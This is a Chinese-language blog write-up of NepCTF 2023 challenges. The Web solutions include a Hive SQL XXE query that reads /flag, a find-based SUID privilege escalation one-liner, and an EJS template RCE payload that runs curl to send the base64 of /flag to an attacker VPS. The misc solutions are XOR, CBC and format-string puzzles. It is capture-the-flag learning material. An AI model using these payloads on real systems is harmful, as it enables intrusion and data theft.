NepCTF 2023
本文最后更新于 202 天前,其中的信息可能已经有所发展或是发生改变。

后期复现

Web

Hive it

参考文档:https://cwiki.apache.org/confluence/display/Hive/LanguageManual

CVE-2018-1282: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1282

  • 访问页面,可知在拥有正确token的情况下可以执行任意hivesql语句
  • 审计源码,存在与token相关的路由
@GetMapping({"/s3cretToken"})
    public String token() {
        return "token";
    }

    @PostMapping({"/tokenCheck"})
    @ResponseBody
    public String token(@RequestBody ParamBean paramBean) throws Exception {
        try {
            Class.forName(driverName);
        } catch (ClassNotFoundException var3) {
            var3.printStackTrace();
            System.exit(1);
        }

        (new StringBuilder()).append("333").append(paramBean.getName()).toString();
        Connection con = DriverManager.getConnection("jdbc:hive2://127.0.0.1:10000/default");
        return String.valueOf(HiveUtils.query(con, paramBean.getName(), paramBean.getSinkType()));
    }
  • /s3cretToken
  • 依据提供的docker信息,已知2.3.3版本hive-jdbc存在sql注入
public class CheckInputFilter {
    public CheckInputFilter() {
    }

    public boolean checkInput(String input) {
        String[] keywords = new String[]{"java", "method", "remote", "outline", "reflect", "reflect2", "real_token", "update", "alter", "create", "drop"};
        String regex = "\\b(" + String.join("|", keywords) + ")\\b";
        Pattern pattern = Pattern.compile(regex);
        Matcher matcher = pattern.matcher(input);
        return matcher.find();
    }
}
SELECT xpath('<?xml version = "1.0"?>
<!DOCTYPE ANY [
        <!ENTITY f SYSTEM "file:///flag">
]>
<root>%26f;</root>','/root/text()')
  • 本地搭建的环境的时候需要使docker-hivedocker-java处于同一内网

ezjava_checkin

  • 从相应头Set-Cookie判断为Shiro
  • 工具梭哈
  • flag位于根目录,权限不够suid提权
  • find 提权
touch test && find test -exec cat /flag \;

Post_card_for_you

  • 源代码
var path = require('path');
const fs = require('fs');
const crypto = require("crypto");

const express = require('express')
const app = express()
const port = 3000

templateDir = path.join(__dirname, 'template');
app.set('view engine', 'ejs');
app.set('template', templateDir);

function sleep(milliSeconds){
    var StartTime =new Date().getTime();
    let i = 0;
    while (new Date().getTime() <StartTime+milliSeconds);

}

app.get('/', function(req, res) {
    return res.sendFile('./index.html', {root: __dirname});
});

app.get('/create', function(req, res) {
    let uuid;
    let name = req.query.name ?? '';
    let address = req.query.address ?? '';
    let message = req.query.message ?? '';
    do {
        uuid = crypto.randomUUID();
    } while (fs.existsSync(`${templateDir}/${uuid}.ejs`))

    try {
        if (name != '' && address != '' && message != '') {
            let source = ["source", "source1", "source2", "source3"].sort(function(){
                return 0.5 - Math.random();
            })
            fs.readFile(source[0]+".html", 'utf8',function(err, pageContent){
                fs.writeFileSync(`${templateDir}/${uuid}.ejs`, pageContent.replace(/--ID--/g, uuid.replace(/-/g, "")));
                sleep(2000);
            })
        } else {
            res.status(500).send("Params `name` or `address` or `message` empty");
            return;
        }
    } catch(err) {
        res.status(500).send("Failed to write file");
        return;
    }

    return res.redirect(`/page?pageid=${uuid}&name=${name}&address=${address}&message=${message}`);
});

app.get('/page', (req,res) => {
    let id = req.query.pageid
    if (!/^[0-9A-F]{8}-[0-9A-F]{4}-[4][0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i.test(id) || !fs.existsSync(`${templateDir}/${id}.ejs`)) {
        res.status(404).send("Sorry, no such id")
        return;
    }
    res.render(`${templateDir}/${id}.ejs`, req.query);
})

app.listen(port, () => {
    console.log(`App listening on port ${port}`)
})
  • ejs rce
{"pageid": id,"settings[view options][outputFunctionName]":  "_tmp1;global.process.mainModule.require('child_process').exec('curl "+vps+"/`cat /flag|base64`');var __tmp2"}

Misc

陌生的志涛

  • 《小魔女学院》新月文字 古龙语言

小叮当弹钢琴

  • morse + hex
youshouldusethistoxorsomething
0x370a05303c290e045005031c2b1858473a5f052117032c39230f005d1e17
  • xor

codes

  • 爆破栈
#include <stdio.h>

int main() {
    char buf[0x8];
    printf("%53$s");
}

与AI共舞的哈夫曼

  • 问 chatgpt

你也喜欢三月七吗

  • CBC
salt = NepCTF2023
key = dd8e671df3882c5be6423cd030bd7cb6

ciphertext = 6148523063484d364c793970625763784c6d6c745a3352774c6d4e76625338794d44497a4c7a41334c7a49304c336c5061316858553070554c6e42755a773d3d
  • 某种文字

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇